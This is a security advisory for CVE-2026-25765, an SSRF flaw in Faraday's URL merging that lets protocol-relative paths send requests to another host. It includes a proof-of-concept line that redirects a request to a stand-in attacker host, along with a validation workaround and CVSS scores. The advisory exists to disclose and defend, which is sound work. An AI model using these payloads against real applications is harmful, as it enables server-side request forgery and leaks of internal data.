CVE-2026-25765
ADVISORY - githubSummary
Impact
Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.
This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).
The ./ prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.
Example:
conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com
Patches
Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.
Workarounds
NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.
Applications should validate and sanitize any user-controlled input before passing it to Faraday request methods. Specifically:
- Reject or strip input that starts with // followed by a non-/ character
- Use an allowlist of permitted path prefixes
- Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday
Example validation:
def safe_path(user_input)
raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})
user_input
end
GitHub
3.9
CVSS SCORE
5.8medium| Package | Type | OS Name | OS Version | Affected Ranges | Fix Versions |
|---|---|---|---|---|---|
| faraday | gem | - | - | <=2.14.0 | 2.14.1 |
CVSS:3 Severity and metrics
The CVSS metrics represent different qualitative aspects of a vulnerability that impact the overall score, as defined by the CVSS Specification.
The vulnerable component is bound to the network stack, but the attack is limited at the protocol level to a logically adjacent topology. This can mean an attack must be launched from the same shared physical (e.g., Bluetooth or IEEE 802.11) or logical (e.g., local IP subnet) network, or from within a secure or otherwise limited administrative domain (e.g., MPLS, secure VPN to an administrative network zone). One example of an Adjacent attack would be an ARP (IPv4) or neighbor discovery (IPv6) flood leading to a denial of service on the local LAN segment (e.g., CVE-2013-6014).
Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.
The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
The vulnerable system can be exploited without interaction from any user.
An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component. In this case, the vulnerable component and the impacted component are different and managed by different security authorities.
There is some loss of confidentiality. Access to some restricted information is obtained, but the attacker does not have control over what information is obtained, or the amount or kind of loss is limited. The information disclosure does not cause a direct, serious loss to the impacted component.
There is no loss of trust or accuracy within the impacted component.
There is no impact to availability within the impacted component.
NIST
3.9
CVSS SCORE
5.8mediumUbuntu
-
CVSS SCORE
N/AmediumRed Hat
3.9
CVSS SCORE
5.8mediumminimos
MINI-2q6m-h48j-jpvq
-
minimos
MINI-4qxc-47j8-hf5c
-
minimos
MINI-534j-f9x3-p974
-
minimos
MINI-6559-xmmm-j3cq
-
minimos
MINI-v3qr-qf46-fcc7
-
minimos
MINI-v3vw-5phm-5754
-